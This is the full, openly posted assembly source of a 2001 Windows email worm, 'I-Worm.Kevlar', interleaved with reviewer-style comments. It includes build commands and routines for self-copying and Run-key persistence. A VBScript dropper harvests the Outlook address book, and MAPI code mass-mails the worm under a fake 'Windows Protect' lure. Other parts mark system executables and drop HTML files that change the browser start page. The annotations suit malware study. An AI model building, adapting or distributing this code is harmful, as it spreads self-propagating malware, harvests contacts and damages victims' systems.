
I-Worm.Kevlar - Source Code

Jul 27th, 2023
  1. comment #
  2. Name : I-Worm.Kevlar
  3. Author : PetiK
  4. Date : August 7th 2001 - August 16th 2001
  5. Size : 5120 byte
  6.  
  7. Action : Copy itself to %System%\Kevlar32.exe hidden attribute
  8.             %System%\MScfg32.exe normal attribute
  9.      Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
  10.  
  11.     * Infects each %Windir%\C???????.exe file by writing "PetiK" into the file
  12.     * For each %Windir%\*.exe, it adds .htm to the name and creates a new file with ActiveX
  13.     * Creates C:\__.vbs. This file takes all addresses in the Address Book and saves them in
  14.       %windir%\AddBook.txt. The worm scans this file to find the addresses and sends a new mail :
  15.  
  16.         Subject : Windows Protect !!
  17.         Body :  The smallest software to stop your computer to bug in each time.
  18.             I have found this program on WWW.KEVLAR-PROTECT.COM
  19.  
  20.             Take a look at the attchment.
  21.  
  22.                     Bye and have a nice day.
  23.  
  24.         Attachment : MScfg32.exe
  25.  
  26.     * It creates the %windir%\MSinfo32.txt. It looks like this :
  27.  
  28.         [File Infected]     => Name of C???????.exe file infected
  29.         CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
  30.         CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
  31.  
  32.         [EMail saved]       => Some address found in the address book
  33.         first@mail.com=Next victim
  34.         second@mail.com=Next victim
  35.  
  36.  
  37. To build the worm:
  38. tasm32 /M /ML Kevlar
  39. tlink32 -Tpe -aa -x Kevlar,,,import32
  40. upx -9 Kevlar.exe
  41.  
  42. To delete the worm:
  43. @echo off
  44. del %windir%\system\Kevlar32.exe
  45. del %windir%\system\MScfg32.exe
  46. del %windir%\*.exe.htm
  47. del %windir%\MSinfo32.txt
  48. del %windir%\AddBook.txt
  49.  
  50. #
  51.  
  ; Syntax: TASM (MASM mode), Intel operand order. Target: 32-bit Win32 PE,
  ; stdcall imports resolved by tlink32 against import32 (see build line in the header).
  52. .586p                          ; Pentium instruction set, privileged forms allowed
  53. .model flat                    ; 32-bit flat model: one code/data address space
  54. .code
  55.  
  56. JUMPS                          ; let TASM widen out-of-range conditional jumps
  57.  
  ; callx NAME: declare NAME as an external procedure and call it. Every Win32 API
  ; used below goes through this macro, so the import table lists each one by name.
  58. callx macro a
  59. extrn a:proc                   ; declared at the point of use, not in a header
  60. call a
  61. endm
  62.  
  63. include useful.inc
  64.  
  ; ---- Entry point / installation ----
  ; Artifacts created here: %System%\MScfg32.exe (plain copy, later used as the mail
  ; attachment) and %System%\Kevlar32.exe (copy with the read-only attribute set).
  ; Register roles: esi = Orig (path of the running image), edi = path buffer being built.
  ; The path buffers are 50 bytes and the API return value is added to edi without
  ; checking it against that size, so a long system directory overruns the buffer.
  65. DEBUT:                         ; program entry (see `end DEBUT` at the bottom)
  66. F_NAME: push  50
  67.     mov   esi,offset Orig
  68.     push  esi
  69.     push  0
  70.     callx GetModuleFileNameA   ; Orig = full path of this executable
  71.  
  72.     mov   edi,offset CopyName2
  73.     push  edi                  ; saved; restored by the pop after the stores
  74.     push  50
  75.     push  edi
  76.     callx GetSystemDirectoryA  ; CopyName2 = %System%
  77.     add   edi,eax              ; eax = characters written -> edi at the NUL
  78.     mov   eax,'cSM\'           ; append "\MScfg32.exe" as three little-endian dwords
  79.     stosd
  80.     mov   eax,'23gf'
  81.     stosd
  82.     mov   eax,'exe.'
  83.     stosd                      ; no NUL stored: relies on the zero-filled buffer
  84.     pop   edi                  ; edi = CopyName2
  85.     push  0                    ; bFailIfExists = FALSE, overwrite
  86.     push  edi
  87.     push  esi
  88.     callx CopyFileA            ; %System%\MScfg32.exe = copy of self (normal attributes)
  89.  
  90.     mov   edi,offset CopyName
  91.     push  edi
  92.     push  50
  93.     push  edi
  94.     callx GetSystemDirectoryA  ; CopyName = %System%
  95.     add   edi,eax
  96.     mov   al,'\'               ; append "\Kevlar32.exe"
  97.     stosb
  98.     mov   eax,'lveK'
  99.     stosd
  100.     mov   eax,'23ra'
  101.     stosd
  102.     mov   eax,'exe.'
  103.     stosd
  104.     pop   edi                  ; edi = CopyName
  105.  
  106.     push  esi
  107.     callx GetFileAttributesA   ; attributes of the running image
  108.     cmp   eax,1                ; exactly FILE_ATTRIBUTE_READONLY, the attribute set on the installed copy below
  109.     je    SUITE                ; already running as the installed copy -> payload path
  110.  
  111.     push  0
  112.     push  edi
  113.     push  esi
  114.     callx CopyFileA            ; %System%\Kevlar32.exe = copy of self
  115.  
  116.     push  01h                  ; FILE_ATTRIBUTE_READONLY (the header text says "hidden", which would be 02h)
  117.     push  edi
  118.     callx SetFileAttributesA   ; this attribute is what the check at 108 keys on
  119.  
  120.  
  ; ---- First-run only: Run-key persistence, nickname box, marker infection ----
  ; SHSetValueA is resolved at run time from SHLWAPI.dll rather than imported.
  121. REG:    pushad
  122.     @pushsz "SHLWAPI.dll"      ; @pushsz is from useful.inc (not shown); presumably pushes the address of an inline string
  123.     callx LoadLibraryA
  124.     test  eax,eax
  125.     jz    FIN                  ; leaves the pushad frame behind; FIN only calls ExitProcess
  126.     mov   edi,eax              ; edi = module handle
  127.     @pushsz "SHSetValueA"
  128.     push  edi
  129.     callx GetProcAddress
  130.     test  eax,eax
  131.     jz    FIN
  132.     mov   esi,eax              ; esi = SHSetValueA
  133.     push  08h                  ; cbData = 8: only the first 8 bytes of CopyName are stored, so the Run value is very likely truncated
  134.     push  offset CopyName      ; pvData = %System%\Kevlar32.exe
  135.     push  01h                  ; dwType = REG_SZ
  136.     @pushsz "Kevlar32"         ; value name
  137.     @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  138.     push  80000002h            ; HKEY_LOCAL_MACHINE (requires write access to HKLM)
  139.     call  esi                  ; SHSetValueA(hkey, subkey, value, type, data, cb)
  140.     push  edi
  141.     callx FreeLibrary
  142.     popad
  143.  
  144.     call  Nick                 ; fill `nickname` with 1..9 pseudo-random letters
  145.    
  146.     mov   edi,offset nickname
  147.     push  40h                  ; MB_ICONINFORMATION
  148.     @pushsz "Hello, my name is :"   ; caption
  149.     push  edi                  ; text = nickname
  150.     push  0                    ; no owner window
  151.     callx MessageBoxA          ; the only visible sign on first run
  152.  
  153.     call  Infect               ; mark %Windir%\C???????.exe files, log to MSinfo32.txt
  154.  
  155.     jmp   FIN                  ; first-run path never reaches the mail routine
  156.  
  ; ---- Installed-copy path: drop *.exe.htm files, then harvest addresses via VBS ----
  ; Artifacts: C:\__.vbs (deleted after 10 s) and %Windir%\AddBook.txt (left behind).
  157. SUITE:  call  Infect2          ; create <name>.exe.htm beside every %Windir%\*.exe
  158. VB_F:   pushad
  159.     push  00h                  ; hTemplateFile
  160.     push  80h                  ; FILE_ATTRIBUTE_NORMAL
  161.     push  02h                  ; CREATE_ALWAYS
  162.     push  00h                  ; no security attributes
  163.     push  01h                  ; FILE_SHARE_READ
  164.     push  40000000h            ; GENERIC_WRITE
  165.     @pushsz "C:\__.vbs"
  166.     callx CreateFileA
  167.     test  eax,eax              ; result is never branched on: a failed open still reaches WriteFile
  168.     xchg  edi,eax              ; edi = file handle
  169.     push  00h
  170.     push  offset octets        ; receives bytes written
  171.     push  VBSSIZE
  172.     push  offset vbsd          ; the address-book script (see vbsd in .data)
  173.     push  edi
  174.     callx WriteFile
  175.     push  edi
  176.     callx CloseHandle
  177.     popad
  178.     push  1                    ; SW_SHOWNORMAL
  179.     @pushsz "wscript C:\__.vbs"
  180.     callx WinExec              ; the script writes %Windir%\AddBook.txt, ending it with "!"
  181.     push  10000
  182.     callx Sleep                ; fixed 10 s wait instead of waiting on the script process
  183.     @pushsz "C:\__.vbs"
  184.     callx DeleteFileA          ; the script is removed; AddBook.txt stays
  185.  
  ; ---- Build %Windir%\AddBook.txt into `addbook` and hand it to OPEN ----
  ; The `push edi` below has no matching pop; the stack is not unwound because FIN exits.
  186. SCAN1:  mov   edi,offset addbook
  187.     push  edi
  188.     push  50
  189.     push  edi
  190.     callx GetWindowsDirectoryA ; addbook = %Windir%
  191.     add   edi,eax              ; edi at the NUL
  192.     mov   eax,"ddA\"           ; append "\AddBook.txt"
  193.     stosd
  194.     mov   eax,"kooB"
  195.     stosd
  196.     mov   eax,"txt."
  197.     stosd
  198.     xor   eax,eax
  199.     stosd                      ; explicit NUL terminator (unlike the other path builders)
  200.     call  OPEN                 ; map the file and mail every address in it
  201.  
  202. FIN:    push  00h              ; exit code 0; every path ends here without unwinding
  203.     callx ExitProcess
  204.  
  ; Nick: writes 1..9 pseudo-random uppercase letters into `nickname`.
  ; In:   nothing (seeds from GetTickCount). Out: nickname filled, edi past the last letter.
  ; Clobbers eax, ecx, edx, edi, flags.
  ; No NUL is stored after the letters; `nickname db 11 dup (?)` relies on the rest being zero.
  205.     Nick    Proc
  206.     mov   edi,offset nickname
  207.     callx GetTickCount
  208.     push  9
  209.     pop   ecx
  210.     xor   edx,edx              ; edx:eax / ecx, remainder in edx
  211.     div   ecx
  212.     inc   edx                  ; length = (tick mod 9) + 1 -> 1..9
  213.     mov   ecx,edx
  214.     name_g:
  215.     push  ecx                  ; loop counter survives the calls below
  216.     callx GetTickCount
  217.     push  'Z'-'A'              ; 25: remainder 0..24, so 'Z' is never produced
  218.     pop   ecx
  219.     xor   edx,edx
  220.     div   ecx
  221.     xchg  eax,edx              ; al = remainder
  222.     add   al,'A'
  223.     stosb
  224.     callx GetTickCount
  225.     push  100
  226.     pop   ecx
  227.     xor   edx,edx
  228.     div   ecx
  229.     push  edx                  ; Sleep(tick mod 100 ms) so successive ticks differ
  230.     callx Sleep
  231.     pop   ecx                  ; restore the counter pushed at name_g
  232.     loop  name_g
  233.     ret
  234.     Nick    EndP
  235.  
  ; Infect: for each %Windir%\C???????.exe, map the file read/write and, if it looks like
  ; a PE image and is not already marked, overwrite 5 bytes of the DOS header at offset
  ; 12h with "PetiK". No code is added to the host; the "infection" is a marker only.
  ; Each marked file is logged under [File Infected] in %Windir%\MSinfo32.txt.
  ; Registers (inside pushad/popad): ebx = file handle, ebp = mapping handle,
  ; edi = view base; `verif` = 1 when the current file was marked.
  ; NOTE(review): at line 290 esi is loaded from eax, which after the xchg holds the
  ; previous edi rather than the view base, so the header checks read from a stale
  ; pointer -- as written this looks like a bug. Also, when a header check fails the
  ; view is not unmapped (only the handles are closed).
  236.     Infect  Proc
  237.     pushad
  238.     push  50
  239.     push  offset WinPath
  240.     callx GetWindowsDirectoryA
  241.     push  offset WinPath
  242.     callx SetCurrentDirectoryA ; relative names from FindFirstFile resolve in %Windir%
  243.     FFF:
  244.     push  offset Search
  245.     @pushsz "C???????.exe"
  246.     callx FindFirstFileA
  247.     inc   eax                  ; INVALID_HANDLE_VALUE (-1) -> 0
  248.     je    F_INF
  249.     dec   eax
  250.     mov   [exeHdl],eax
  251.     I_FILE:
  252.     mov   verif,0
  253.     xor   eax,eax
  254.     push  eax                  ; hTemplateFile
  255.     push  eax                  ; attributes
  256.     push  03h                  ; OPEN_EXISTING
  257.     push  eax                  ; security
  258.     push  eax                  ; no sharing
  259.     push  80000000h or 40000000h   ; GENERIC_READ | GENERIC_WRITE
  260.     push  offset Search.cFileName
  261.     callx CreateFileA
  262.     inc   eax
  263.     jz    FNF                  ; open failed -> next file
  264.     dec   eax
  265.     xchg  eax,ebx              ; ebx = file handle
  266.  
  267.     xor   eax,eax
  268.     push  eax
  269.     push  eax
  270.     push  eax                  ; size 0 = whole file
  271.     push  04h                  ; PAGE_READWRITE
  272.     push  eax
  273.     push  ebx  
  274.     callx CreateFileMappingA
  275.     test  eax,eax
  276.     jz    CL1
  277.     xchg  eax,ebp              ; ebp = mapping handle
  278.  
  279.     xor   eax,eax
  280.     push  eax
  281.     push  eax
  282.     push  eax
  283.     push  06h                  ; FILE_MAP_READ | FILE_MAP_WRITE
  284.     push  ebp
  285.     callx MapViewOfFile
  286.     test  eax,eax
  287.     jz    CL2
  288.     xchg  eax,edi              ; edi = view base, eax = previous edi
  289.    
  290.     mov   esi,eax              ; NOTE(review): previous edi, not the view -- see header
  291.     cmp   word ptr [esi],"ZM"  ; DOS "MZ" signature
  292.     jne   CL2
  293.     cmp   byte ptr [esi+18h],"@"   ; e_lfarlc == 40h, as in NT-era PE files
  294.     jne   CL2
  295.     cmp   word ptr [esi+80h],"EP"  ; expects "PE" at fixed offset 80h instead of reading e_lfanew at 3Ch
  296.     jne   CL2
  297.     cmp   byte ptr [esi+12h],"P"   ; already marked?
  298.     je    CL2
  299.     mov   word ptr [esi+12h],"eP"  ; write "PetiK" into the DOS header
  300.     mov   word ptr [esi+14h],"it"
  301.     mov   byte ptr [esi+16h],"K"
  302.     inc   verif
  303.     push  edi
  304.     callx UnmapViewOfFile      ; only on the marked path
  305.     CL2:
  306.     push  ebp
  307.     callx CloseHandle
  308.     CL1:
  309.     push  ebx
  310.     callx CloseHandle
  311.  
  312.     cmp   verif,1
  313.     jne   FNF
  314.     mov   edi,offset InfoFile
  315.     push  edi
  316.     push  50
  317.     push  edi
  318.     callx GetWindowsDirectoryA ; InfoFile = %Windir%
  319.     add   edi,eax
  320.     mov   eax,'iSM\'           ; append "\MSinfo32.txt"
  321.     stosd
  322.     mov   eax,'3ofn'
  323.     stosd
  324.     mov   eax,'xt.2'
  325.     stosd
  326.     mov   al,'t'
  327.     stosb
  328.     pop   edi
  329.     mov   esi,edi              ; esi = InfoFile
  330.     push  esi                  ; lpFileName
  331.     @pushsz "Infected by W32.Kevlar.PetiK"   ; lpString
  332.     push    offset Search.cFileName         ; lpKeyName
  333.     @pushsz "File Infected"                 ; lpAppName (section)
  334.     callx   WritePrivateProfileStringA      ; writes "<name>=Infected by W32.Kevlar.PetiK"
  335.  
  336.     FNF:
  337.     push  offset Search
  338.     push  [exeHdl]
  339.     callx FindNextFileA
  340.     test  eax,eax
  341.     jne   I_FILE
  342.     FC:
  343.     push  [exeHdl]
  344.     callx FindClose
  345.     F_INF:
  346.     popad
  347.     ret
  348.     Infect  EndP
  349.  
  ; Infect2: for each %Windir%\*.exe, create <name>.exe.htm beside it containing `htmd`
  ; (an HTML page with a VBScript block). The .exe itself is not modified.
  ; The inner pushad/popad keeps the find loop's registers intact; ebp = file handle.
  350.     Infect2 Proc
  351.     pushad
  352.     push  50
  353.     push  offset WinPath
  354.     callx GetWindowsDirectoryA
  355.     push  offset WinPath
  356.     callx SetCurrentDirectoryA ; new files land in %Windir%
  357.     FFF2:
  358.     push  offset Search
  359.     @pushsz "*.exe"
  360.     callx FindFirstFileA
  361.     inc   eax
  362.     je    F_INF2
  363.     dec   eax
  364.     mov   [exeHdl],eax
  365.     I_FILE2:
  366.     pushad
  367.     mov   edi,offset Search.cFileName
  368.     push  edi
  369.     callx lstrlen
  370.     add   edi,eax              ; edi at the NUL of the found name
  371.     mov   eax,"mth."           ; append ".htm" in place; FindNextFileA overwrites the name again
  372.     stosd
  373.     xor   eax,eax
  374.     stosd                      ; NUL terminator
  375.     push  00h                  ; hTemplateFile
  376.     push  80h                  ; FILE_ATTRIBUTE_NORMAL
  377.     push  02h                  ; CREATE_ALWAYS
  378.     push  00h
  379.     push  01h                  ; FILE_SHARE_READ
  380.     push  40000000h            ; GENERIC_WRITE
  381.     push  offset Search.cFileName
  382.     callx CreateFileA
  383.     test  eax,eax              ; never branched on: a failed open still reaches WriteFile
  384.     xchg  ebp,eax              ; ebp = file handle
  385.     push  00h
  386.     push  offset octets
  387.     push  HTMSIZE
  388.     push  offset htmd
  389.     push  ebp
  390.     callx WriteFile
  391.     push  ebp
  392.     callx CloseHandle
  393.     popad
  394.     FNF2:
  395.     push  offset Search
  396.     push  [exeHdl]
  397.     callx FindNextFileA
  398.     test  eax,eax
  399.     jne   I_FILE2
  400.     FC2:
  401.     push  [exeHdl]
  402.     callx FindClose
  403.     F_INF2:
  404.     popad
  405.     ret
  406.     Infect2 EndP
  407.  
  ; OPEN: maps %Windir%\AddBook.txt read-only and, if it holds more than 3 bytes, runs
  ; SCAN over it. ebx = file handle, ebp = mapping handle, esi = view base (SCAN reads
  ; from esi). The exit labels F3/F2/F1/NO release whatever was acquired so far.
  408. OPEN:   pushad
  409.     push  00h                  ; hTemplateFile
  410.     push  80h                  ; FILE_ATTRIBUTE_NORMAL
  411.     push  03h                  ; OPEN_EXISTING
  412.     push  00h
  413.     push  01h                  ; FILE_SHARE_READ
  414.     push  80000000h            ; GENERIC_READ
  415.     push  offset addbook
  416.     callx CreateFileA
  417.     inc   eax                  ; INVALID_HANDLE_VALUE -> 0
  418.     je    NO
  419.     dec   eax
  420.     xchg  eax,ebx              ; ebx = file handle
  421.  
  422.     xor   eax,eax
  423.     push  eax
  424.     push  eax
  425.     push  eax
  426.     push  02h                  ; PAGE_READONLY
  427.     push  eax
  428.     push  ebx
  429.     callx CreateFileMappingA
  430.     test  eax,eax
  431.     je    F1
  432.     xchg  eax,ebp              ; ebp = mapping handle
  433.  
  434.     xor   eax,eax
  435.     push  eax
  436.     push  eax
  437.     push  eax
  438.     push  04h                  ; FILE_MAP_READ
  439.     push  ebp
  440.     callx MapViewOfFile
  441.     test  eax,eax
  442.     je    F2
  443.     xchg  eax,esi              ; esi = view base
  444.  
  445.     push  00h
  446.     push  ebx
  447.     callx GetFileSize
  448.     cmp   eax,03h
  449.     jbe   F3                    ; is the file empty ??
  450.  
  451.     call  SCAN                 ; returns only when SCAN meets the '!' terminator
  452.  
  453. F3: push  esi
  454.     callx UnmapViewOfFile
  455. F2: push  ebp
  456.     callx CloseHandle
  457. F1: push  ebx
  458.     callx CloseHandle
  459. NO: popad
  460.     ret
  461.  
  ; SCAN: copies the mapped address book into m_addr one line at a time and calls
  ; SEND_MAIL for every line holding at least one character other than '@'.
  ; esi = position in the mapped file (set by OPEN); edi = write position in m_addr;
  ; edx = count of non-'@' characters on the current line. Stops only at '!' (the
  ; terminator the VBS script appends); a file without it is read past the mapping.
  ; NOTE(review): every jump back to SCAN executes pushad again without a matching
  ; popad, so the stack grows 32 bytes per line and the `ret` at f_mail does not pop
  ; OPEN's return address once more than one line has been processed -- looks like a
  ; bug. The 128-byte m_addr buffer is also written without any bound check.
  462.     SCAN:
  463.     pushad
  464.     xor   edx,edx
  465.     mov   edi,offset m_addr
  466.     push  edi                  ; start of m_addr, restored at end of line
  467.     p_c:  lodsb
  468.     cmp   al," "
  469.     je    car_s
  470.     cmp   al,0dh
  471.     je    entr1
  472.     cmp   al,0ah
  473.     je    entr2
  474.     cmp   al,"!"
  475.     je    f_mail               ; end marker
  476.     cmp   al,"@"
  477.     je    not_a                ; '@' is copied but not counted
  478.     inc   edx
  479.     not_a:  stosb
  480.         jmp p_c
  481.     car_s:  inc esi            ; a space also skips the byte that follows it
  482.         jmp p_c
  483.     entr1:  xor al,al          ; CR: terminate the copied line
  484.         stosb
  485.         pop edi
  486.         test edx,edx
  487.         je  SCAN               ; nothing but '@' on this line: skip
  488.         call SEND_MAIL
  489.         jmp SCAN
  490.     entr2:  xor al,al          ; LF: discard (CRLF lines have already been handled at the CR)
  491.         stosb
  492.         pop edi
  493.         jmp SCAN
  494.     f_mail: popad
  495.         ret
  496.  
  ; SEND_MAIL: logs the current address under [EMail saved] in %Windir%\MSinfo32.txt
  ; and sends one message through Simple MAPI using the `Message` structure in .data
  ; (subject/body below, MScfg32.exe attached, m_addr as both name and address).
  ; In: m_addr = NUL-terminated recipient. Clobbers eax plus whatever the APIs clobber.
  497.     SEND_MAIL:
  498.         push  50
  499.         push  offset save_addr
  500.         callx GetWindowsDirectoryA ; save_addr = %Windir% (rewritten on every call)
  501.         @pushsz "\MSinfo32.txt"
  502.         push  offset save_addr
  503.         callx lstrcat              ; save_addr = %Windir%\MSinfo32.txt
  504.         push  offset save_addr     ; lpFileName
  505.         @pushsz "Next victim"      ; lpString
  506.         push  offset m_addr        ; lpKeyName = the address
  507.         @pushsz "EMail saved"      ; lpAppName (section)
  508.         callx   WritePrivateProfileStringA
  509.         xor   eax,eax
  510.         push  eax                  ; ulReserved
  511.         push  eax                  ; flFlags = 0: no MAPI_DIALOG, so no compose window
  512.         push  offset Message       ; lpMessage
  513.         push  eax                  ; ulUIParam
  514.         push  [MAPIHdl]            ; lhSession; MAPIHdl is 0 and never set
  515.         callx MAPISendMail
  516.         ret
  517.  
  518.  
  519.  
  520. .data
  521. ; ===== INSTALLATION =====
  ; Path buffers are 50 bytes; the code that appends to them adds the API's return
  ; value without checking it against this size (see F_NAME), and it relies on the
  ; zero fill for NUL termination.
  522. Orig        db 50 dup (0)      ; path of the running image
  523. CopyName    db 50 dup (0)      ; %System%\Kevlar32.exe
  524. CopyName2   db 50 dup (0)      ; %System%\MScfg32.exe (mail attachment)
  525. nickname    db 11 dup (?)      ; up to 9 letters from Nick, no NUL stored
  526.  
  527. ; ===== INFECTION =====
  528. InfoFile    db 50 dup (0)      ; %Windir%\MSinfo32.txt (ini-style log of marked files)
  529. WinPath     db 50 dup (0)      ; %Windir%, used for SetCurrentDirectoryA
  530. exeHdl      dd ?               ; FindFirstFile handle
  531. verif       dd ?               ; 1 when the current host was marked
  532. octets      dd ?               ; bytes-written out-parameter for WriteFile
  533.  
  534. ; ===== MAIL =====
  535. addbook     db 50 dup (0)      ; %Windir%\AddBook.txt (written by the VBS script)
  536. save_addr   db 50 dup (0)      ; %Windir%\MSinfo32.txt, rebuilt per mail
  537. m_addr      db 128 dup (?)     ; current recipient line; filled by SCAN without bound check
  538. MAPIHdl     dd 0               ; MAPI session handle; stays 0
  ; Subject, body and sender name of the lure mail (useful as content-filter strings).
  539. subject     db "Windows Protect !!",00h
  540. body        db "The smallest software to stop your computer to bug in each time.",0dh,0ah
  541.         db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
  542.         db "Take a look at the attchment.",0dh,0ah,0dh,0ah
  543.         db 09h,09h,"Bye and have a nice day.",00h
  544. NameFrom    db "Your friend",00h
  545.  
  546.  
  ; Simple MAPI structures laid out by hand, one dd per field.
  ; Message = MapiMessage: ulReserved, lpszSubject, lpszNoteText, lpszMessageType,
  ; lpszDateReceived, lpszConversationID, flFlags, lpOriginator, nRecipCount, lpRecips,
  ; nFileCount, lpFiles.
  547. Message     dd ?
  548.         dd offset subject
  549.         dd offset body
  550.         dd ?
  551.         dd ?
  552.         dd ?
  553.         dd 2                   ; flFlags = MAPI_RECEIPT_REQUESTED
  554.         dd offset MsgFrom
  555.         dd 1                   ; one recipient
  556.         dd offset MsgTo
  557.         dd 1                   ; one attachment
  558.         dd offset Attach
  559.  
  ; MsgFrom / MsgTo = MapiRecipDesc: ulReserved, ulRecipClass, lpszName, lpszAddress,
  ; ulEIDSize, lpEntryID.
  560. MsgFrom     dd ?
  561.         dd ?                   ; ulRecipClass 0 = originator
  562.         dd NameFrom            ; written without `offset`, unlike the other pointer fields -- worth confirming TASM emits the address here
  563.         dd ?
  564.         dd ?
  565.         dd ?
  566.  
  567. MsgTo       dd ?
  568.         dd 1                   ; ulRecipClass 1 = MAPI_TO
  569.         dd offset m_addr       ; display name = address
  570.         dd offset m_addr
  571.         dd ?
  572.         dd ?
  573.  
  ; Attach = MapiFileDesc: ulReserved, flFlags, nPosition, lpszPathName, lpszFileName, lpFileType.
  574. Attach      dd ?
  575.         dd ?
  576.         dd ?
  577.         dd offset CopyName2    ; attaches %System%\MScfg32.exe
  578.         dd ?
  579.         dd ?
  580.  
  581.        
  582.  
  ; htmd: contents of each dropped <name>.exe.htm. The VBScript block tests for
  ; scripting access (err 429 = object could not be created) and, when available,
  ; sets the IE start page via WScript.Shell.RegWrite. Written as-is by Infect2.
  583. htmd:
  584. db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
  585. db '<script language=vbscript>',0dh,0ah
  586. db 'on error resume next',0dh,0ah
  587. db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
  588. db 'If err.number=429 then',0dh,0ah                       ; ActiveX unavailable -> nag text only
  589. db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
  590. db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>'
  591. db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
  592. db 'Else',0dh,0ah
  593. db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
  594. db 'document.write "<font face=''verdana'' size=''3'' color=red>'
  595. db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah
  596. db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
  597. db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah
  598. db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah   ; registry artifact
  599. db 'End If',0dh,0ah
  600. db '</script></html>',00h
  601. HTMSIZE = $-htmd               ; includes the trailing NUL
  602.  
  ; vbsd: contents of C:\__.vbs. Through Outlook.Application it walks every address
  ; list and appends each entry's Address to <WindowsFolder>\AddBook.txt (one per
  ; line, file reopened per entry), then writes the "!" line that SCAN uses as its
  ; end marker. GetSpecialFolder(0) is the Windows folder, matching `addbook`.
  603. vbsd:
  604. db 'On Error Resume Next',0dh,0ah
  605. db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
  606. db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
  607. db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
  608. db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah   ; truncate/create
  609. db 'c.Close',0dh,0ah
  610. db 'For Each M In L.AddressLists',0dh,0ah
  611. db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
  612. db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
  613. db 'Set P = M.AddressEntries(O)',0dh,0ah
  614. db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah   ; 8 = append
  615. db 'c.WriteLine P.Address',0dh,0ah
  616. db 'c.Close',0dh,0ah
  617. db 'Next',0dh,0ah
  618. db 'End If',0dh,0ah
  619. db 'Next',0dh,0ah
  620. db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
  621. db 'c.WriteLine "!"',0dh,0ah    ; terminator expected by SCAN
  622. db 'c.Close',0dh,0ah
  623. VBSSIZE = $-vbsd               ; no trailing NUL, unlike htmd
  624.  
  625. signature   db "I-Worm.Kevlar coded by PetiK (c)2001",00h
  626.  
  627.  
  ; Hand-declared Win32 structures (TASM `struct`). Only Search.cFileName is read by
  ; the code. cFileName is declared with `dd` and a MAX_PATH count rather than
  ; MAX_PATH bytes, so it appears to be four times the real size and the fields after
  ; it no longer match the API layout; its own offset (2Ch) is still correct.
  628. MAX_PATH        equ 260
  629. FILETIME        struct
  630. dwLowDateTime       dd ?
  631. dwHighDateTime      dd ?
  632. FILETIME        ends
  633. WIN32_FIND_DATA     struct
  634. dwFileAttributes    dd ?
  635. ftCreationTime      FILETIME ?
  636. ftLastAccessTime    FILETIME ?
  637. ftLastWriteTime     FILETIME ?
  638. nFileSizeHigh       dd ?
  639. nFileSizeLow        dd ?
  640. dwReserved0     dd ?
  641. dwReserved1     dd ?
  642. cFileName       dd MAX_PATH (?)    ; see note above
  643. cAlternateFileName  db 13 dup (?)
  644.             db 3 dup (?)
  645. WIN32_FIND_DATA     ends
  646.  
  647. Search      WIN32_FIND_DATA <>  ; shared find buffer for Infect and Infect2
  648.  
  649.  
  650. end DEBUT                      ; entry point
  651. end
Tags: internet worm